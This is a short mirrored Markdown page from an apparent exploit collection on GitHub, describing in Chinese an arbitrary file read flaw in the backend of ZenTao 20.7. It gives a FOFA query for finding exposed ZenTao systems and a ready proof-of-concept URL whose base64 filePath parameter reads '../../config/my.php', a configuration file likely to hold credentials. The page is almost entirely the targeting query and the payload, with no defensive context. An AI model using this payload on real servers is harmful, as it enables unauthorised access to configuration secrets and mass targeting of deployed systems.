mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
17 lines
439 B
Markdown
17 lines
439 B
Markdown
# 禅道20.7后台任意文件读取漏洞
|
|
|
|
禅道20.7后台任意文件读取漏洞,只能读取网站目录下的文件
|
|
|
|
## fofa
|
|
|
|
```javascript
|
|
app="易软天创-禅道系统"
|
|
```
|
|
|
|
## poc
|
|
|
|
```javascript
|
|
http://192.168.91.1:8017/index.php?m=editor&f=edit&filePath=Li4vLi4vY29uZmlnL215LnBocA==&action=extendOther&isExtends=3
|
|
```
|
|
|
|
 |